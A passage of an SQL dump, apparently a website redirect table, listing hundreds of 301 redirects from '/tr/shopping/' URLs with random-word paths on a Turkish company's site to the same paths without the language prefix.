02:28:43','0000-00-00 00:00:00',301),(70472,'https://3s-technologies.com.tr/tr/shopping/idlest/2989466018.html',NULL,'https://3s-technologies.com.tr/shopping/idlest/2989466018.html','',1,0,'2026-06-11 02:28:46','0000-00-00 00:00:00',301),(70473,'https://3s-technologies.com.tr/tr/shopping/rubbage/220748127.html',NULL,'https://3s-technologies.com.tr/shopping/rubbage/220748127.html','',1,0,'2026-06-11 02:28:49','0000-00-00 00:00:00',301),(70474,'https://3s-technologies.com.tr/tr/shopping/abridger/2115257577.html',NULL,'https://3s-technologies.com.tr/shopping/abridger/2115257577.html','',1,0,'2026-06-11 02:28:52','0000-00-00 00:00:00',301),(70475,'https://3s-technologies.com.tr/tr/shopping/nothing/6655253.html',NULL,'https://3s-technologies.com.tr/shopping/nothing/6655253.html','',1,0,'2026-06-11 02:28:55','0000-00-00 00:00:00',301),(70476,'https://3s-technologies.com.tr/tr/shopping/firman/5443170.html',NULL,'https://3s-technologies.com.tr/shopping/firman/5443170.html','',1,0,'2026-06-11 02:28:58','0000-00-00 00:00:00',301),(70477,'https://3s-technologies.com.tr/tr/shopping/bottomry/4134438013.html',NULL,'https://3s-technologies.com.tr/shopping/bottomry/4134438013.html','',1,0,'2026-06-11 02:29:01','0000-00-00 00:00:00',301),(70478,'https://3s-technologies.com.tr/tr/shopping/orbits/751138644.html',NULL,'https://3s-technologies.com.tr/shopping/orbits/751138644.html','',1,0,'2026-06-11 02:29:04','0000-00-00 00:00:00',301),(70479,'https://3s-technologies.com.tr/tr/shopping/teeming/3449962915.html',NULL,'https://3s-technologies.com.tr/shopping/teeming/3449962915.html','',1,0,'2026-06-11 02:29:07','0000-00-00 00:00:00',301),(70480,'https://3s-technologies.com.tr/tr/shopping/daubing/1506071052.html',NULL,'https://3s-technologies.com.tr/shopping/daubing/1506071052.html','',1,0,'2026-06-11 02:29:10','0000-00-00 00:00:00',301),(70481,'https://3s-technologies.com.tr/tr/shopping/pendular/1193859207.html',NULL,'https://3s-technologies.com.tr/shopping/pendular/1193859207.html','',1,0,'2026-06-11 02:29:13','0000-00-00 00:00:00',301),(70482,'https://3s-technologies.com.tr/tr/shopping/sanded/3354993422.html',NULL,'https://3s-technologies.com.tr/shopping/sanded/3354993422.html','',1,0,'2026-06-11 02:29:16','0000-00-00 00:00:00',301),(70483,'https://3s-technologies.com.tr/tr/shopping/thiefly/1756439217.html',NULL,'https://3s-technologies.com.tr/shopping/thiefly/1756439217.html','',1,0,'2026-06-11 02:29:19','0000-00-00 00:00:00',301),(70484,'https://3s-technologies.com.tr/tr/shopping/squadroned/3200260324.html',NULL,'https://3s-technologies.com.tr/shopping/squadroned/3200260324.html','',1,0,'2026-06-11 02:29:23','0000-00-00 00:00:00',301),(70485,'https://3s-technologies.com.tr/tr/shopping/zulus/3691918617.html',NULL,'https://3s-technologies.com.tr/shopping/zulus/3691918617.html','',1,0,'2026-06-11 02:29:27','0000-00-00 00:00:00',301),(70486,'https://3s-technologies.com.tr/tr/shopping/chronogrammatical/582914042.html',NULL,'https://3s-technologies.com.tr/shopping/chronogrammatical/582914042.html','',1,0,'2026-06-11 02:29:29','0000-00-00 00:00:00',301),(70487,'https://3s-technologies.com.tr/tr/shopping/linsang/1002175489.html',NULL,'https://3s-technologies.com.tr/shopping/linsang/1002175489.html','',1,0,'2026-06-11 02:29:32','0000-00-00 00:00:00',301),(70488,'https://3s-technologies.com.tr/tr/shopping/neutralizing/4161693708.html',NULL,'https://3s-technologies.com.tr/shopping/neutralizing/4161693708.html','',1,0,'2026-06-11 02:29:36','0000-00-00 00:00:00',301),(70489,'https://3s-technologies.com.tr/tr/shopping/monkey/878527056.html',NULL,'https://3s-technologies.com.tr/shopping/monkey/878527056.html','',1,0,'2026-06-11 02:29:39','0000-00-00 00:00:00',301),(70490,'https://3s-technologies.com.tr/tr/shopping/polemically/4217538559.html',NULL,'https://3s-technologies.com.tr/shopping/polemically/4217538559.html','',1,0,'2026-06-11 02:29:42','0000-00-00 00:00:00',301),(70491,'https://3s-technologies.com.tr/tr/shopping/defilading/3603385491.html',NULL,'https://3s-technologies.com.tr/shopping/defilading/3603385491.html','',1,0,'2026-06-11 02:29:45','0000-00-00 00:00:00',301),(70492,'https://3s-technologies.com.tr/tr/shopping/distyle/518548664.html',NULL,'https://3s-technologies.com.tr/shopping/distyle/518548664.html','',1,0,'2026-06-11 02:29:48','0000-00-00 00:00:00',301),(70493,'https://3s-technologies.com.tr/tr/shopping/solfaed/43086325.html',NULL,'https://3s-technologies.com.tr/shopping/solfaed/43086325.html','',1,0,'2026-06-11 02:29:51','0000-00-00 00:00:00',301),(70494,'https://3s-technologies.com.tr/tr/shopping/twittered/2591844455.html',NULL,'https://3s-technologies.com.tr/shopping/twittered/2591844455.html','',1,0,'2026-06-11 02:29:54','0000-00-00 00:00:00',301),(70495,'https://3s-technologies.com.tr/tr/shopping/appetizing/564105229.html',NULL,'https://3s-technologies.com.tr/shopping/appetizing/564105229.html','',1,0,'2026-06-11 02:29:57','0000-00-00 00:00:00',301),(70496,'https://3s-technologies.com.tr/tr/shopping/stereographically/1184518124.html',NULL,'https://3s-technologies.com.tr/shopping/stereographically/1184518124.html','',1,0,'2026-06-11 02:30:00','0000-00-00 00:00:00',301),(70497,'https://3s-technologies.com.tr/tr/shopping/ringlet/3205886989.html',NULL,'https://3s-technologies.com.tr/shopping/ringlet/3205886989.html','',1,0,'2026-06-11 02:30:03','0000-00-00 00:00:00',301),(70498,'https://3s-technologies.com.tr/tr/shopping/foretime/1603857708.html',NULL,'https://3s-technologies.com.tr/shopping/foretime/1603857708.html','',1,0,'2026-06-11 02:30:06','0000-00-00 00:00:00',301),(70499,'https://3s-technologies.com.tr/tr/shopping/postexistent/1151627264.html',NULL,'https://3s-technologies.com.tr/shopping/postexistent/1151627264.html','',1,0,'2026-06-11 02:30:09','0000-00-00 00:00:00',301),(70500,'https://3s-technologies.com.tr/tr/shopping/checker/3223066899.html',NULL,'https://3s-technologies.com.tr/shopping/checker/3223066899.html','',1,0,'2026-06-11 02:30:15','0000-00-00 00:00:00',301),(70501,'https://3s-technologies.com.tr/tr/shopping/obsecration/701548357.html',NULL,'https://3s-technologies.com.tr/shopping/obsecration/701548357.html','',1,0,'2026-06-11 02:30:20','0000-00-00 00:00:00',301),(70502,'https://3s-technologies.com.tr/tr/shopping/joyancy/1649704411.html',NULL,'https://3s-technologies.com.tr/shopping/joyancy/1649704411.html','',1,0,'2026-06-11 02:30:23','0000-00-00 00:00:00',301),(70503,'https://3s-technologies.com.tr/tr/shopping/operandi/3910396907.html',NULL,'https://3s-technologies.com.tr/shopping/operandi/3910396907.html','',1,0,'2026-06-11 02:30:26','0000-00-00 00:00:00',301),(70504,'https://3s-technologies.com.tr/tr/shopping/objurgatory/2531928197.html',NULL,'https://3s-technologies.com.tr/shopping/objurgatory/2531928197.html','',1,0,'2026-06-11 02:30:29','0000-00-00 00:00:00',301),(70505,'https://3s-technologies.com.tr/tr/shopping/adjectitious/2857325311.html',NULL,'https://3s-technologies.com.tr/shopping/adjectitious/2857325311.html','',1,0,'2026-06-11 02:30:32','0000-00-00 00:00:00',301),(70506,'https://3s-technologies.com.tr/tr/shopping/accepter/1291252930.html',NULL,'https://3s-technologies.com.tr/shopping/accepter/1291252930.html','',1,0,'2026-06-11 02:30:35','0000-00-00 00:00:00',301),(70507,'https://3s-technologies.com.tr/tr/shopping/headstrongness/3244567131.html',NULL,'https://3s-technologies.com.tr/shopping/headstrongness/3244567131.html','',1,0,'2026-06-11 02:30:38','0000-00-00 00:00:00',301),(70508,'https://3s-technologies.com.tr/tr/shopping/mispaint/155930468.html',NULL,'https://3s-technologies.com.tr/shopping/mispaint/155930468.html','',1,0,'2026-06-11 02:30:40','0000-00-00 00:00:00',301),(70509,'https://3s-technologies.com.tr/tr/shopping/revivable/2962848018.html',NULL,'https://3s-technologies.com.tr/shopping/revivable/2962848018.html','',1,0,'2026-06-11 02:30:44','0000-00-00 00:00:00',301),(70510,'https://3s-technologies.com.tr/tr/shopping/provisionary/97870366.html',NULL,'https://3s-technologies.com.tr/shopping/provisionary/97870366.html','',1,0,'2026-06-11 02:30:47','0000-00-00 00:00:00',301),(70511,'https://3s-technologies.com.tr/tr/shopping/outsentry/2122742536.html',NULL,'https://3s-technologies.com.tr/shopping/outsentry/2122742536.html','',1,0,'2026-06-11 02:30:50','0000-00-00 00:00:00',301),(70512,'https://3s-technologies.com.tr/tr/shopping/colloidal/3556219402.html',NULL,'https://3s-technologies.com.tr/shopping/colloidal/3556219402.html','',1,0,'2026-06-11 02:30:53','0000-00-00 00:00:00',301),(70513,'https://3s-technologies.com.tr/tr/shopping/percesoces/46463014.html',NULL,'https://3s-technologies.com.tr/shopping/percesoces/46463014.html','',1,0,'2026-06-11 02:30:56','0000-00-00 00:00:00',301),(70514,'https://3s-technologies.com.tr/tr/shopping/communistic/3872666151.html',NULL,'https://3s-technologies.com.tr/shopping/communistic/3872666151.html','',1,0,'2026-06-11 02:30:58','0000-00-00 00:00:00',301),(70515,'https://3s-technologies.com.tr/tr/shopping/strouding/3385145272.html',NULL,'https://3s-technologies.com.tr/shopping/strouding/3385145272.html','',1,0,'2026-06-11 02:31:01','0000-00-00 00:00:00',301),(70516,'https://3s-technologies.com.tr/tr/shopping/intervalle/2465590005.html',NULL,'https://3s-technologies.com.tr/shopping/intervalle/2465590005.html','',1,0,'2026-06-11 02:31:05','0000-00-00 00:00:00',301),(70517,'https://3s-technologies.com.tr/tr/shopping/pleated/3710120297.html',NULL,'https://3s-technologies.com.tr/shopping/pleated/3710120297.html','',1,0,'2026-06-11 02:31:08','0000-00-00 00:00:00',301),(70518,'https://3s-technologies.com.tr/tr/shopping/junked/3553795204.html',NULL,'https://3s-technologies.com.tr/shopping/junked/3553795204.html','',1,0,'2026-06-11 02:31:11','0000-00-00 00:00:00',301),(70519,'https://3s-technologies.com.tr/tr/shopping/generousness/1845404354.html',NULL,'https://3s-technologies.com.tr/shopping/generousness/1845404354.html','',1,0,'2026-06-11 02:31:14','0000-00-00 00:00:00',301),(70520,'https://3s-technologies.com.tr/tr/shopping/respite/288149344.html',NULL,'https://3s-technologies.com.tr/shopping/respite/288149344.html','',1,0,'2026-06-11 02:31:17','0000-00-00 00:00:00',301),(70521,'https://3s-technologies.com.tr/tr/shopping/intermural/996374586.html',NULL,'https://3s-technologies.com.tr/shopping/intermural/996374586.html','',1,0,'2026-06-11 02:31:20','0000-00-00 00:00:00',301),(70522,'https://3s-technologies.com.tr/tr/shopping/thunderstrike/2446859345.html',NULL,'https://3s-technologies.com.tr/shopping/thunderstrike/2446859345.html','',1,0,'2026-06-11 02:31:23','0000-00-00 00:00:00',301),(70523,'https://3s-technologies.com.tr/tr/shopping/outfool/3589666750.html',NULL,'https://3s-technologies.com.tr/shopping/outfool/3589666750.html','',1,0,'2026-06-11 02:31:26','0000-00-00 00:00:00',301),(70524,'https://3s-technologies.com.tr/tr/shopping/altus/3053621672.html',NULL,'https://3s-technologies.com.tr/shopping/altus/3053621672.html','',1,0,'2026-06-11 02:31:29','0000-00-00 00:00:00',301),(70525,'https://3s-technologies.com.tr/tr/shopping/beluted/1902958.html',NULL,'https://3s-technologies.com.tr/shopping/beluted/1902958.html','',1,0,'2026-06-11 02:31:32','0000-00-00 00:00:00',301),(70526,'https://3s-technologies.com.tr/tr/shopping/inducted/609348388.html',NULL,'https://3s-technologies.com.tr/shopping/inducted/609348388.html','',1,0,'2026-06-11 02:31:35','0000-00-00 00:00:00',301),(70527,'https://3s-technologies.com.tr/tr/shopping/scopically/1029821934.html',NULL,'https://3s-technologies.com.tr/shopping/scopically/1029821934.html','',1,0,'2026-06-11 02:31:38','0000-00-00 00:00:00',301),(70528,'https://3s-technologies.com.tr/tr/shopping/audaciously/3464893787.html',NULL,'https://3s-technologies.com.tr/shopping/audaciously/3464893787.html','',1,0,'2026-06-11 02:31:41','0000-00-00 00:00:00',301),(70529,'https://3s-technologies.com.tr/tr/shopping/sorted/1212111580.html',NULL,'https://3s-technologies.com.tr/shopping/sorted/1212111580.html','',1,0,'2026-06-11 02:31:44','0000-00-00 00:00:00',301),(70530,'https://3s-technologies.com.tr/tr/shopping/trochal/531188315.html',NULL,'https://3s-technologies.com.tr/shopping/trochal/531188315.html','',1,0,'2026-06-11 02:31:47','0000-00-00 00:00:00',301),(70531,'https://3s-technologies.com.tr/tr/shopping/serrate/42922818.html',NULL,'https://3s-technologies.com.tr/shopping/serrate/42922818.html','',1,0,'2026-06-11 02:31:50','0000-00-00 00:00:00',301),(70532,'https://3s-technologies.com.tr/tr/shopping/rhymester/3688100501.html',NULL,'https://3s-technologies.com.tr/shopping/rhymester/3688100501.html','',1,0,'2026-06-11 02:31:53','0000-00-00 00:00:00',301),(70533,'https://3s-technologies.com.tr/tr/shopping/aromatica/3646917134.html',NULL,'https://3s-technologies.com.tr/shopping/aromatica/3646917134.html','',1,0,'2026-06-11 02:31:56','0000-00-00 00:00:00',301),(70534,'https://3s-technologies.com.tr/tr/shopping/teller/2642914046.html',NULL,'https://3s-technologies.com.tr/shopping/teller/2642914046.html','',1,0,'2026-06-11 02:31:59','0000-00-00 00:00:00',301),(70535,'https://3s-technologies.com.tr/tr/shopping/ichnoscopy/3064096733.html',NULL,'https://3s-technologies.com.tr/shopping/ichnoscopy/3064096733.html','',1,0,'2026-06-11 02:32:07','0000-00-00 00:00:00',301),(70536,'https://3s-technologies.com.tr/tr/shopping/imposthumating/3274561820.html',NULL,'https://3s-technologies.com.tr/shopping/imposthumating/3274561820.html','',1,0,'2026-06-11 02:32:09','0000-00-00 00:00:00',301),(70537,'https://3s-technologies.com.tr/tr/shopping/creekfish/175305201.html',NULL,'https://3s-technologies.com.tr/shopping/creekfish/175305201.html','',1,0,'2026-06-11 02:32:12','0000-00-00 00:00:00',301),(70538,'https://3s-technologies.com.tr/tr/shopping/closeknit/1488370656.html',NULL,'https://3s-technologies.com.tr/shopping/closeknit/1488370656.html','',1,0,'2026-06-11 02:32:15','0000-00-00 00:00:00',301),(70539,'https://3s-technologies.com.tr/tr/shopping/inflammably/2400353394.html',NULL,'https://3s-technologies.com.tr/shopping/inflammably/2400353394.html','',1,0,'2026-06-11 02:32:18','0000-00-00 00:00:00',301),(70540,'https://3s-technologies.com.tr/tr/shopping/decampment/2103703426.html',NULL,'https://3s-technologies.com.tr/shopping/decampment/2103703426.html','',1,0,'2026-06-11 02:32:21','0000-00-00 00:00:00',301),(70541,'https://3s-technologies.com.tr/tr/shopping/brownism/453084810.html',NULL,'https://3s-technologies.com.tr/shopping/brownism/453084810.html','',1,0,'2026-06-11 02:32:24','0000-00-00 00:00:00',301),(70542,'https://3s-technologies.com.tr/tr/shopping/simonpure/4012772351.html',NULL,'https://3s-technologies.com.tr/shopping/simonpure/4012772351.html','',1,0,'2026-06-11 02:32:30','0000-00-00 00:00:00',301),(70543,'https://3s-technologies.com.tr/tr/shopping/imagining/3425086010.html',NULL,'https://3s-technologies.com.tr/shopping/imagining/3425086010.html','',1,0,'2026-06-11 02:32:35','0000-00-00 00:00:00',301),(70544,'https://3s-technologies.com.tr/tr/shopping/dogmatized/930100114.html',NULL,'https://3s-technologies.com.tr/shopping/dogmatized/930100114.html','',1,0,'2026-06-11 02:32:38','0000-00-00 00:00:00',301),(70545,'https://3s-technologies.com.tr/tr/shopping/pteridophyta/2435997697.html',NULL,'https://3s-technologies.com.tr/shopping/pteridophyta/2435997697.html','',1,0,'2026-06-11 02:32:41','0000-00-00 00:00:00',301),(70546,'https://3s-technologies.com.tr/tr/shopping/eigne/3325527729.html',NULL,'https://3s-technologies.com.tr/shopping/eigne/3325527729.html','',1,0,'2026-06-11 02:32:44','0000-00-00 00:00:00',301),(70547,'https://3s-technologies.com.tr/tr/shopping/vegete/2214610199.html',NULL,'https://3s-technologies.com.tr/shopping/vegete/2214610199.html','',1,0,'2026-06-11 02:32:47','0000-00-00 00:00:00',301),(70548,'https://3s-technologies.com.tr/tr/shopping/oppressive/887868155.html',NULL,'https://3s-technologies.com.tr/shopping/oppressive/887868155.html','',1,0,'2026-06-11 02:32:50','0000-00-00 00:00:00',301),(70549,'https://3s-technologies.com.tr/tr/shopping/theoretics/1761027989.html',NULL,'https://3s-technologies.com.tr/shopping/theoretics/1761027989.html','',1,0,'2026-06-11 02:32:53','0000-00-00 00:00:00',301),(70550,'https://3s-technologies.com.tr/tr/shopping/havior/1403136066.html',NULL,'https://3s-technologies.com.tr/shopping/havior/1403136066.html','',1,0,'2026-06-11 02:32:56','0000-00-00 00:00:00',301),(70551,'https://3s-technologies.com.tr/tr/shopping/potpie/2335227285.html',NULL,'https://3s-technologies.com.tr/shopping/potpie/2335227285.html','',1,0,'2026-06-11 02:32:59','0000-00-00 00:00:00',301),(70552,'https://3s-technologies.com.tr/tr/shopping/persevered/4074294528.html',NULL,'https://3s-technologies.com.tr/shopping/persevered/4074294528.html','',1,0,'2026-06-11 02:33:02','0000-00-00 00:00:00',301),(70553,'https://3s-technologies.com.tr/tr/shopping/tossing/2757033234.html',NULL,'https://3s-technologies.com.tr/shopping/tossing/2757033234.html','',1,0,'2026-06-11 02:33:05','0000-00-00 00:00:00',301),(70554,'https://3s-technologies.com.tr/tr/shopping/adjournal/4189158334.html',NULL,'https://3s-technologies.com.tr/shopping/adjournal/4189158334.html','',1,0,'2026-06-11 02:33:08','0000-00-00 00:00:00',301),(70555,'https://3s-technologies.com.tr/tr/shopping/amelanchier/218323913.html',NULL,'https://3s-technologies.com.tr/shopping/amelanchier/218323913.html','',1,0,'2026-06-11 02:33:11','0000-00-00 00:00:00',301),(70556,'https://3s-technologies.com.tr/tr/shopping/beacon/1596940791.html',NULL,'https://3s-technologies.com.tr/shopping/beacon/1596940791.html','',1,0,'2026-06-11 02:33:14','0000-00-00 00:00:00',301),(70557,'https://3s-technologies.com.tr/tr/shopping/hottempered/656090982.html',NULL,'https://3s-technologies.com.tr/shopping/hottempered/656090982.html','',1,0,'2026-06-11 02:33:20','0000-00-00 00:00:00',301),(70558,'https://3s-technologies.com.tr/tr/shopping/colubris/623200122.html',NULL,'https://3s-technologies.com.tr/shopping/colubris/623200122.html','',1,0,'2026-06-11 02:33:24','0000-00-00 00:00:00',301),(70559,'https://3s-technologies.com.tr/tr/shopping/thwite/4089436514.html',NULL,'https://3s-technologies.com.tr/shopping/thwite/4089436514.html','',1,0,'2026-06-11 02:33:27','0000-00-00 00:00:00',301),(70560,'https://3s-technologies.com.tr/tr/shopping/carnallite/2720209213.html',NULL,'https://3s-technologies.com.tr/shopping/carnallite/2720209213.html','',1,0,'2026-06-11 02:33:30','0000-00-00 00:00:00',301),(70561,'https://3s-technologies.com.tr/tr/shopping/trisyllabically/2794676389.html',NULL,'https://3s-technologies.com.tr/shopping/trisyllabically/2794676389.html','',1,0,'2026-06-11 02:33:33','0000-00-00 00:00:00',301),(70562,'https://3s-technologies.com.tr/tr/shopping/madness/621988023.html',NULL,'https://3s-technologies.com.tr/shopping/madness/621988023.html','',1,0,'2026-06-11 02:33:36','0000-00-00 00:00:00',301),(70563,'https://3s-technologies.com.tr/tr/shopping/tindal/3014342923.html',NULL,'https://3s-technologies.com.tr/shopping/tindal/3014342923.html','',1,0,'2026-06-11 02:33:39','0000-00-00 00:00:00',301),(70564,'https://3s-technologies.com.tr/tr/shopping/hectic/1483781868.html',NULL,'https://3s-technologies.com.tr/shopping/hectic/1483781868.html','',1,0,'2026-06-11 02:33:42','0000-00-00 00:00:00',301),(70565,'https://3s-technologies.com.tr/tr/shopping/militantly/1380423735.html',NULL,'https://3s-technologies.com.tr/shopping/militantly/1380423735.html','',1,0,'2026-06-11 02:33:45','0000-00-00 00:00:00',301),(70566,'https://3s-technologies.com.tr/tr/shopping/irradiant/44298424.html',NULL,'https://3s-technologies.com.tr/shopping/irradiant/44298424.html','',1,0,'2026-06-11 02:33:48','0000-00-00 00:00:00',301),(70567,'https://3s-technologies.com.tr/tr/shopping/twilling/2312956413.html',NULL,'https://3s-technologies.com.tr/shopping/twilling/2312956413.html','',1,0,'2026-06-11 02:33:51','0000-00-00 00:00:00',301),(70568,'https://3s-technologies.com.tr/tr/shopping/osteography/3686888418.html',NULL,'https://3s-technologies.com.tr/shopping/osteography/3686888418.html','',1,0,'2026-06-11 02:33:55','0000-00-00 00:00:00',301),(70569,'https://3s-technologies.com.tr/tr/shopping/histographical/2521855533.html',NULL,'https://3s-technologies.com.tr/shopping/histographical/2521855533.html','',1,0,'2026-06-11 02:33:57','0000-00-00 00:00:00',301),(70570,'https://3s-technologies.com.tr/tr/shopping/viscousness/3861640980.html',NULL,'https://3s-technologies.com.tr/shopping/viscousness/3861640980.html','',1,0,'2026-06-11 02:34:00','0000-00-00 00:00:00',301),(70571,'https://3s-technologies.com.tr/tr/shopping/exocardiac/1185730223.html',NULL,'https://3s-technologies.com.tr/shopping/exocardiac/1185730223.html','',1,0,'2026-06-11 02:34:03','0000-00-00 00:00:00',301),(70572,'https://3s-technologies.com.tr/tr/shopping/corruptibility/1678399416.html',NULL,'https://3s-technologies.com.tr/shopping/corruptibility/1678399416.html','',1,0,'2026-06-11 02:34:07','0000-00-00 00:00:00',301),(70573,'https://3s-technologies.com.tr/tr/shopping/adfiliated/4148761704.html',NULL,'https://3s-technologies.com.tr/shopping/adfiliated/4148761704.html','',1,0,'2026-06-11 02:34:09','0000-00-00 00:00:00',301),(70574,'https://3s-technologies.com.tr/tr/shopping/caenogenesis/1170539759.html',NULL,'https://3s-technologies.com.tr/shopping/caenogenesis/1170539759.html','',1,0,'2026-06-11 02:34:12','0000-00-00 00:00:00',301),(70575,'https://3s-technologies.com.tr/tr/shopping/spoonful/954720072.html',NULL,'https://3s-technologies.com.tr/shopping/spoonful/954720072.html','',1,0,'2026-06-11 02:34:16','0000-00-00 00:00:00',301),(70576,'https://3s-technologies.com.tr/tr/shopping/wheyishness/3210004630.html',NULL,'https://3s-technologies.com.tr/shopping/wheyishness/3210004630.html','',1,0,'2026-06-11 02:34:18','0000-00-00 00:00:00',301),(70577,'https://3s-technologies.com.tr/tr/shopping/gulty/2171071762.html',NULL,'https://3s-technologies.com.tr/shopping/gulty/2171071762.html','',1,0,'2026-06-11 02:34:21','0000-00-00 00:00:00',301),(70578,'https://3s-technologies.com.tr/tr/shopping/inversion/1871291615.html',NULL,'https://3s-technologies.com.tr/shopping/inversion/1871291615.html','',1,0,'2026-06-11 02:34:25','0000-00-00 00:00:00',301),(70579,'https://3s-technologies.com.tr/tr/shopping/languaged/4058729002.html',NULL,'https://3s-technologies.com.tr/shopping/languaged/4058729002.html','',1,0,'2026-06-11 02:34:27','0000-00-00 00:00:00',301),(70580,'https://3s-technologies.com.tr/tr/shopping/atticum/3004417508.html',NULL,'https://3s-technologies.com.tr/shopping/atticum/3004417508.html','',1,0,'2026-06-11 02:34:30','0000-00-00 00:00:00',301),(70581,'https://3s-technologies.com.tr/tr/shopping/cindery/2344310482.html',NULL,'https://3s-technologies.com.tr/shopping/cindery/2344310482.html','',1,0,'2026-06-11 02:34:33','0000-00-00 00:00:00',301),(70582,'https://3s-technologies.com.tr/tr/shopping/carolinian/2855710367.html',NULL,'https://3s-technologies.com.tr/shopping/carolinian/2855710367.html','',1,0,'2026-06-11 02:34:36','0000-00-00 00:00:00',301),(70583,'https://3s-technologies.com.tr/tr/shopping/optography/3166656673.html',NULL,'https://3s-technologies.com.tr/shopping/optography/3166656673.html','',1,0,'2026-06-11 02:34:39','0000-00-00 00:00:00',301),(70584,'https://3s-technologies.com.tr/tr/shopping/septane/1031034033.html',NULL,'https://3s-technologies.com.tr/shopping/septane/1031034033.html','',1,0,'2026-06-11 02:34:42','0000-00-00 00:00:00',301),(70585,'https://3s-technologies.com.tr/tr/shopping/sheepmaster/2069043995.html',NULL,'https://3s-technologies.com.tr/shopping/sheepmaster/2069043995.html','',1,0,'2026-06-11 02:34:45','0000-00-00 00:00:00',301),(70586,'https://3s-technologies.com.tr/tr/shopping/idioticon/76370134.html',NULL,'https://3s-technologies.com.tr/shopping/idioticon/76370134.html','',1,0,'2026-06-11 02:34:48','0000-00-00 00:00:00',301),(70587,'https://3s-technologies.com.tr/tr/shopping/dross/1041376085.html',NULL,'https://3s-technologies.com.tr/shopping/dross/1041376085.html','',1,0,'2026-06-11 02:34:52','0000-00-00 00:00:00',301),(70588,'https://3s-technologies.com.tr/tr/shopping/indignation/2780794125.html',NULL,'https://3s-technologies.com.tr/shopping/indignation/2780794125.html','',1,0,'2026-06-11 02:34:55','0000-00-00 00:00:00',301),(70589,'https://3s-technologies.com.tr/tr/shopping/scamperer/1222327001.html',NULL,'https://3s-technologies.com.tr/shopping/scamperer/1222327001.html','',1,0,'2026-06-11 02:34:59','0000-00-00 00:00:00',301),(70590,'https://3s-technologies.com.tr/tr/shopping/shelfy/2135382187.html',NULL,'https://3s-technologies.com.tr/shopping/shelfy/2135382187.html','',1,0,'2026-06-11 02:35:02','0000-00-00 00:00:00',301),(70591,'https://3s-technologies.com.tr/tr/shopping/coalmouse/3486230480.html',NULL,'https://3s-technologies.com.tr/shopping/coalmouse/3486230480.html','',1,0,'2026-06-11 02:35:05','0000-00-00 00:00:00',301),(70592,'https://3s-technologies.com.tr/tr/shopping/sickening/1474063030.html',NULL,'https://3s-technologies.com.tr/shopping/sickening/1474063030.html','',1,0,'2026-06-11 02:35:08','0000-00-00 00:00:00',301),(70593,'https://3s-technologies.com.tr/tr/shopping/catastasis/3745725409.html',NULL,'https://3s-technologies.com.tr/shopping/catastasis/3745725409.html','',1,0,'2026-06-11 02:35:11','0000-00-00 00:00:00',301),(70594,'https://3s-technologies.com.tr/tr/shopping/dermatography/1649069757.html',NULL,'https://3s-technologies.com.tr/shopping/dermatography/1649069757.html','',1,0,'2026-06-11 02:35:14','0000-00-00 00:00:00',301),(70595,'https://3s-technologies.com.tr/tr/shopping/delightedly/1187423682.html',NULL,'https://3s-technologies.com.tr/shopping/delightedly/1187423682.html','',1,0,'2026-06-11 02:35:17','0000-00-00 00:00:00',301),(70596,'https://3s-technologies.com.tr/tr/shopping/roses/4183771353.html',NULL,'https://3s-technologies.com.tr/shopping/roses/4183771353.html','',1,0,'2026-06-11 02:35:20','0000-00-00 00:00:00',301),(70597,'https://3s-technologies.com.tr/tr/shopping/audiolingual/3972610587.html',NULL,'https://3s-technologies.com.tr/shopping/audiolingual/3972610587.html','',1,0,'2026-06-11 02:35:23','0000-00-00 00:00:00',301),(70598,'https://3s-technologies.com.tr/tr/shopping/maitre/3669765467.html',NULL,'https://3s-technologies.com.tr/shopping/maitre/3669765467.html','',1,0,'2026-06-11 02:35:26','0000-00-00 00:00:00',301),(70599,'https://3s-technologies.com.tr/tr/shopping/reexhibit/2551227802.html',NULL,'https://3s-technologies.com.tr/shopping/reexhibit/2551227802.html','',1,0,'2026-06-11 02:35:29','0000-00-00 00:00:00',301),(70600,'https://3s-technologies.com.tr/tr/shopping/camel/1258758073.html',NULL,'https://3s-technologies.com.tr/shopping/camel/1258758073.html','',1,0,'2026-06-11 02:35:32','0000-00-00 00:00:00',301),(70601,'https://3s-technologies.com.tr/tr/shopping/sermocinator/2150947168.html',NULL,'https://3s-technologies.com.tr/shopping/sermocinator/2150947168.html','',1,0,'2026-06-11 02:35:35','0000-00-00 00:00:00',301),(70602,'https://3s-technologies.com.tr/tr/shopping/lasting/3847027961.html',NULL,'https://3s-technologies.com.tr/shopping/lasting/3847027961.html','',1,0,'2026-06-11 02:35:38','0000-00-00 00:00:00',301),(70603,'https://3s-technologies.com.tr/tr/shopping/ingali/1064552676.html',NULL,'https://3s-technologies.com.tr/shopping/ingali/1064552676.html','',1,0,'2026-06-11 02:35:41','0000-00-00 00:00:00',301),(70604,'https://3s-technologies.com.tr/tr/shopping/actualisation/801421450.html',NULL,'https://3s-technologies.com.tr/shopping/actualisation/801421450.html','',1,0,'2026-06-11 02:35:44','0000-00-00 00:00:00',301),(70605,'https://3s-technologies.com.tr/tr/shopping/triumvirate/3902895690.html',NULL,'https://3s-technologies.com.tr/shopping/triumvirate/3902895690.html','',1,0,'2026-06-11 02:35:47','0000-00-00 00:00:00',301),(70606,'https://3s-technologies.com.tr/tr/shopping/beseechingly/583317265.html',NULL,'https://3s-technologies.com.tr/shopping/beseechingly/583317265.html','',1,0,'2026-06-11 02:35:50','0000-00-00 00:00:00',301),(70607,'https://3s-technologies.com.tr/tr/shopping/hematemesis/1487158557.html',NULL,'https://3s-technologies.com.tr/shopping/hematemesis/1487158557.html','',1,0,'2026-06-11 02:35:53','0000-00-00 00:00:00',301),(70608,'https://3s-technologies.com.tr/tr/shopping/nintu/976827453.html',NULL,'https://3s-technologies.com.tr/shopping/nintu/976827453.html','',1,0,'2026-06-11 02:35:56','0000-00-00 00:00:00',301),(70609,'https://3s-technologies.com.tr/tr/shopping/bachmani/2421319971.html',NULL,'https://3s-technologies.com.tr/shopping/bachmani/2421319971.html','',1,0,'2026-06-11 02:36:00','0000-00-00 00:00:00',301),(70610,'https://3s-technologies.com.tr/tr/shopping/gurge/4187311581.html',NULL,'https://3s-technologies.com.tr/shopping/gurge/4187311581.html','',1,0,'2026-06-11 02:36:02','0000-00-00 00:00:00',301),(70611,'https://3s-technologies.com.tr/tr/shopping/semoule/2719574559.html',NULL,'https://3s-technologies.com.tr/shopping/semoule/2719574559.html','',1,0,'2026-06-11 02:36:05','0000-00-00 00:00:00',301),(70612,'https://3s-technologies.com.tr/tr/shopping/pedalian/124095388.html',NULL,'https://3s-technologies.com.tr/shopping/pedalian/124095388.html','',1,0,'2026-06-11 02:36:08','0000-00-00 